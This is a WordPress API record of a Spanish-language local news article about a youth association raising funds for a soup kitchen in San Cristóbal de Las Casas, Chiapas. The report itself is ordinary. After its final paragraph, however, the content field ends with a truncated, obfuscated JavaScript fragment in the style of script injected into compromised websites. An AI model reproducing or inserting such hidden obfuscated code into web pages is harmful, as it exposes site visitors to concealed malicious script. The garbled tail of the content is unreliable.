{"id":12623,"date":"2023-11-15T00:27:12","date_gmt":"2023-11-15T00:27:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12623"},"modified":"2023-11-15T00:27:13","modified_gmt":"2023-11-15T00:27:13","slug":"llaman-a-apoyar-al-comedor-de-la-caridad-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12623","title":{"rendered":"Llaman a apoyar al Comedor de La Caridad en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"770\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-14-at-4.40.56-PM-1024x770.jpeg\" alt=\"\" class=\"wp-image-12624\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-14-at-4.40.56-PM-1024x770.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-14-at-4.40.56-PM-300x226.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-14-at-4.40.56-PM-768x578.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-14-at-4.40.56-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<br>14 de noviembre del 2023. San Crist\u00f3bal de Las Casas-. La Asociaci\u00f3n Civil Juventudes Manos en Acci\u00f3n llevar\u00e1 a cabo una cena para recaudar fondos y sean beneficiadas personas en situaci\u00f3n \u00a0vulnerable, lo cual tendr\u00e1 lugar en el Centro de Convenciones del Carmen el 9 de diciembre a partir de las 7 de la noche, por lo que su presidente Manuel Ram\u00edrez Jim\u00e9nez invit\u00f3 a la ciudadan\u00eda en general a apoyar la causa, ya que est\u00e1 es la tercera ocasi\u00f3n que buscan recaudar fondos de esta manera, ya que se encuentran integrados por j\u00f3venes y sus recursos, as\u00ed \u00a0como operatividad, provienen de quienes tienen buena voluntad.<\/p>\n\n\n\n<p>&#8220;Cada a\u00f1o hacemos una cena de gala tenemos, la gente se suma, este a\u00f1o vamos a tener un evento cultural muy bonito, se lleva a cabo sumando voluntades, ya que todo el dinero recaudado es para el Comedor Santa Rita de la Caridad, es un proyecto donde se atiende principalmente a personas en situaci\u00f3n de calle, viudas, personas enfermas, migrantes, tenemos el apoyo del Mercado Popular del Sur, ellos nos echan la mano, cada fin de semana nos entregan donaciones, que son productos en buena calidad&#8221;, coment\u00f3 en entrevista.<\/p>\n\n\n\n<p>Asimismo, dijo esperar que m\u00e1s empresas se unan al proyecto, &#8220;con acciones nobles de hoteleros, restauranteros, se han sumado diferentes organizaciones, iglesias, entre otros, estamos muy agradecidos con los buenos corazones que se suman. Los insumos han incrementado sus precios, solo a la semana gastamos entre 20 y 25 kilos de frijol, solo en eso, no tenemos el apoyo que quisi\u00e9ramos pero vamos saliendo adelante&#8221;.<\/p>\n\n\n\n<p>&#8220;Tenemos un registro entre 80 y 120 personas que reciben alimentos diario, la mayor\u00eda son personas enfermas en situaci\u00f3n de vulnerabilidad, al mes damos entre 5 mil y 6 mil platos entre desayunos y comida, somos una Asociaci\u00f3n que prioriza la poblaci\u00f3n juvenil atendemos casos muy espec\u00edficos de adolescentes y j\u00f3venes, tenemos un convenio con una casa hogar de la ciudad, si nosotros no podemos atenderlos porque son menores de edad, se canaliza principalmente con el DIF y con la Casa Hogar&#8221;, agreg\u00f3.<\/p>\n\n\n\n<p>Por \u00faltimo, se\u00f1al\u00f3 que en el Consejo General de la Asociaci\u00f3n son 8 compa\u00f1eros, que est\u00e1n distribuidos en diferentes \u00e1reas y con los voluntarios son en total entre 25 y 35, &#8220;quienes elaboran la comida todos somos voluntarios, diario permanente estamos unos 10 compa\u00f1eros atendiendo la casa y las necesidades, recogiendo donaciones; para la cena no hay un costo, reciben un pase doble, y ya al final recibimos donativos, no tiene un costo \u00fanicamente &nbsp;es para llevar un control de los asistentes, lo cual va ser en el Centro de Convenciones del Carmen el cupo limitado es de 350 y ya llevamos apartado la mitad&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal14 de noviembre del 2023. San Crist\u00f3bal de Las Casas-. La Asociaci\u00f3n Civil Juventudes Manos en Acci\u00f3n llevar\u00e1 a cabo una cena para recaudar fondos y sean beneficiadas personas en situaci\u00f3n \u00a0vulnerable, lo cual tendr\u00e1 lugar en el Centro de Convenciones del Carmen el 9 de diciembre a partir de las 7 de la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12624,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12623","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12623","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12623"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12623\/revisions"}],"predecessor-version":[{"id":12625,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12623\/revisions\/12625"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12624"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12623"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12623"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12623"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}